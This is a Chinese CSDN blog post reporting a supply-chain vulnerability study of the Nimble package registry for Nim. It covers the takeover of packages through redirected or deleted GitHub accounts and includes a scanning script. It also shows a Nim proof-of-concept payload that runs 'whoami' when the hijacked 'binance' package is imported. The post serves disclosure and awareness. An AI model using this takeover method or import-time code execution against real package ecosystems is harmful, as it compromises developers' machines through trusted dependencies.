供应链安全:黑客攻击 Nimble 包

最新推荐文章于 2024-09-09 17:43:45 发布
最新推荐文章于 2024-09-09 17:43:45 发布
阅读量916 收藏 18
点赞数 14
分类专栏: 网络安全 文章标签: 安全 安全威胁分析 安全架构 区块链 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47075747/article/details/140910722
版权

在软件开发领域,包管理器对于管理依赖项和简化开发过程至关重要。但是,这些工具并非对漏洞免疫。今天,我们将深入研究一个有趣的案例研究,了解我如何利用 Nimble 包管理器的漏洞来接管包并可能危害系统。系好安全带;这将是一次技术之旅。

Nimble 是什么?

Nimble 是 Nim 编程语言的包管理器,提供了一种处理库和依赖项的简单方法。它提供了一个名为“nimble.directory”的平台,开发人员可以在该平台上发布他们的包,使其他人更容易使用这些库并将其集成到他们的项目中。

img

漏洞:URL 重定向和不存在的用户名

我对 Nimble 生态系统的探索发现了两个严重的漏洞:

  1. URL 重定向:当软件包的 GitHub URL 被重定向时,攻击者可以在重定向发生之前接管以前的 URL。如果原始 URL 不再有效,攻击者就可以控制软件包。
  2. 不存在的用户名:如果与 Nimble 包关联的 GitHub 用户名不存在,则可以利用它来声明对该包的所有权。

我如何发现并利用这些漏洞

我首先创建了一个脚本来分析 nimble.directory 上的所有软件包。在2,393 个软件包中,发现139 个存在漏洞。该脚本扫描了:

  • 带有重定向 GitHub URL 的软件包
  • 与不存在的 GitHub 用户名关联的软件包

剧本亮点

import requests

def check_redirected_url(package_url):
    try:
        response = requests.head(package_url, allow_redirects=True)
        if response.history:
            return response.history[-1].url
    except requests.RequestException as e:
        print(f"Error checking URL {package_url}: {e}")
    return None

def check_username_existence(username):
    try:
        response = requests.get(f'https://github.com/{username}')
        return response.status_code != 404
    except requests.RequestException as e:
        print(f"Error checking username {username}: {e}")
    return False

for package in all_packages:
    redirected_url = check_redirected_url(package.github_url)
    if redirected_url:
        print(f"Redirected URL found: {redirected_url}")
    username = package.username
    if not check_username_existence(username):
        print(f"Username {username} does not exist. Possible takeover.")        # Additional logic to exploit the nonexistent username

案例研究:接管“binance”软件包

我接管的软件包之一是“binance”,之前托管在https://github.com/Imperator26/binance。通过利用重定向漏洞,我能够控制软件包存储库并将其替换为恶意版本。

恶意负载

新版本的软件包包含一个脚本,该脚本可以在任何导入该脚本的系统上执行whoami命令。

import osproc

proc runCommand(cmd: string) =
  let result = execProcess(cmd)
  echo result

runCommand("whoami")

当受害者导入该包时,会发生以下情况:

import binance
echo "binance package imported successfully!"

运行时输出:

➜ nim ./test
yunus.aydin
binance package imported successfully!

whoami命令显示了当前用户,表明恶意软件包成功在目标机器上执行了代码。

影响

此漏洞凸显了与软件包管理器相关的重大风险,以及如果没有适当的检查,它们很容易被利用。劫持软件包和注入恶意代码的能力对开发人员及其系统构成了严重威胁。

号码

  • 分析的包裹总数2,393
  • 易受攻击的软件包139

结论

此次调查凸显了软件包管理中安全性的重要性。软件包管理员和开发人员必须实施严格的安全措施来防止此类漏洞。定期审核、安全 URL 处理和用户凭据验证是保护软件供应链的重要步骤。

H_kiwi
关注
  • 14
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Nimble Streamer Monitor:Linux 上 Nimble Streamer 的免费 WmsPanel 替代品-开源
06-28
Nimble Streamer Monitor Hls Streamer Monitor 是 Linux 上 Nimble Streamer 的免费 WmsPanel 替代品。 它提供基本的实时统计信息: 可用功能: - CPU 使用率 - 传入的 RTMP 流(1 = 服务器正在默认端口上接收 rtmp...
CodeStyle:Quick & Nimble 项目的编码风格
06-08
Quick & Nimble 项目的编码风格。 欢迎作为问题和请求请求提供反馈。 目前,这正在讨论中,不适用于 Quick 和 Nimble。 目前这还远不及决赛。 目录 问题 Objective-C 代码风格? 这目前只是快速的 间距 4 个空格...
推荐文章:深入探索Nimble Framework —— 微服务开发的得力助手
gitblog_00184的博客
09-07 306
推荐文章:深入探索Nimble Framework —— 微服务开发的得力助手 Microservice-TemplateTemplates for microservice architecture. Nimble Microservice Framework contains two modules. The first with OpenIddict and the second with...
Nim管理器--Nimble
big_snail的专栏
11-24 3109
Nimble 安装下载:https://github.com/nim-lang/nimble nim软件管理器,如果你有兴趣学习如何创建一个,直接跳到这里。 一:安装 你需要0.9.6或者更高版本的Nim编译器,
探索Nim生态的宝藏:Nimble管理器的广阔世界
gitblog_00104的博客
08-26 279
探索Nim生态的宝藏:Nimble管理器的广阔世界 packagesList of packages for Nimble项目地址:https://gitcode.com/gh_mirrors/package/packages 在这个代码如海的时代,找到一颗颗璀璨的技术明珠变得尤为重要。今天,我们将一起深入了解一个专为Nim编程语言打造的宝藏——Nimble管理器及其配套的Nim packa...
探索蓝牙LE安全:攻击与防御的深度解析
gitblog_00021的博客
05-25 311
探索蓝牙LE安全:攻击与防御的深度解析 项目地址:https://gitcode.com/Charmve/BLE-Security-Attack-Defence Bluetooth-LE Security: Method, Tools and Stack 是一个精心策划的开源项目,旨在深入研究和揭示蓝牙低功耗(BLE)的安全性。这个项目不仅提供了详尽的BLE漏洞分析,还含了多种实用工具和技术堆...
探索新一代物联网连接:RT-THREAD NIMBLE
gitblog_00321的博客
08-08 666
探索新一代物联网连接:RT-THREAD NIMBLE nimbleAn Apache open-source Bluetooth 5.0 stack porting on RT-Thread项目地址:https://gitcode.com/gh_mirrors/nimble7/nimble 项目简介 RT-THREAD NIMBLE 是一款专为 RT-THREAD 操作系统设计的开源蓝牙 5....
nimble 1 蓝牙开发概述
hzlarm的博客
03-08 1932
目录nimble 蓝牙开发概述BLE 简介BLE 基础知识蓝牙设备地址BLE 广播类型标准广播数据BLE 工作概述BLE 常见的操作BLE 常见的工作流程BLE 使用的协议规范GAPGAP 工作模式GAP 工作流程GAP 工作角色、模式、流程关系ATTATT角色属性属性访问方法 - ATT 协议帧GATTGATT角色GATT 数据结构服务(service)服务引用特征(Characteristic)特征声明属性特征值属性特征描述符属性GATT 功能GATT应用详述 nimble 蓝牙开发概述 BLE 简介
nimble 蓝牙开发三:nimble BLE 应用介绍
尝尝你工人爷爷的铁拳
10-27 5073
本文用来介绍使用 nimble 开发的蓝牙应用的逻辑与流程,帮助正在学习使用 nimble 蓝牙协议栈的人更快速的进行蓝牙应用开发
探索未来蓝牙技术:RT-THREAD NIMBLE
gitblog_00373的博客
08-08 284
探索未来蓝牙技术:RT-THREAD NIMBLE nimbleAn Apache open-source Bluetooth 5.0 stack porting on RT-Thread项目地址:https://gitcode.com/gh_mirrors/nimble7/nimble 项目介绍 走进无线通信的新时代,我们很高兴向您推荐一款基于开源蓝牙5.0协议栈的强力工具——RT-THREA...
开源亮点:Apache NimBLE蓝牙5.0栈——突破传统的无线通信解决方案
gitblog_00080的博客
06-23 397
开源亮点:Apache NimBLE蓝牙5.0栈——突破传统的无线通信解决方案 mynewt-nimbleApache mynewt项目地址:https://gitcode.com/gh_mirrors/my/mynewt-nimble 在物联网(IoT)迅速发展的今天,蓝牙技术作为连接智能设备的关键桥梁之一,其重要性不言而喻。Apache NimBLE作为一个全新的开放源代码蓝牙5.0协议栈,...
nimble-demos:NIMBLE项目的演示
04-28
NIMBLE基础 (编写自定义采样器) 演算法 (MCEM) 楷模 生态实例:生态实例 高斯过程:高斯过程 BNP简介:BNP简介 项目React理论模型 逻辑回归:灵活的逻辑回归 随机波动率:随机波动率 零膨胀泊松:零膨胀泊松
降落伞:Nimble软件,用于标记和跟踪Nim中不安全的东西!
02-04
1. **安装Parachute**:使用NimbleNim管理器)来安装Parachute:`nimble install parachute` 2. **运行Parachute**:在项目目录下,运行`parachute`命令,它会扫描所有`.nim`文件,并报告任何不安全的操作。 ...
中本聪与供应链管理之间的区块链技术:来自学术界和实践的见解-研究论文
06-10
该项目开发了一个名为 Nimble 的平台,使供应链物流能够从互联网平台和区块链服务中受益。 再比如,家乐福在 9 个行业(鸡肉、西红柿、鸡蛋、橙子等)实施了区块链,目标是到 2022 年达到 300 个行业。区块链类型或...
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1417
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio及其子)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析安全保护工程
最新发布
weixin_49171105的博客
09-09 380
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 645
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 417
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
Nimble全闪存存储平台:超性能,超低延迟解决方案
1. **稳**:Nimble提供强大的数据保护,即使在同时损坏3块硬盘的情况下也能确保数据安全,避免数据丢失。其控制器故障无衰减设计,保证了服务连续性。 2. **快**:凭借0.5ms(混闪)和0.1ms(全闪)的超低延迟,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

H_kiwi

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值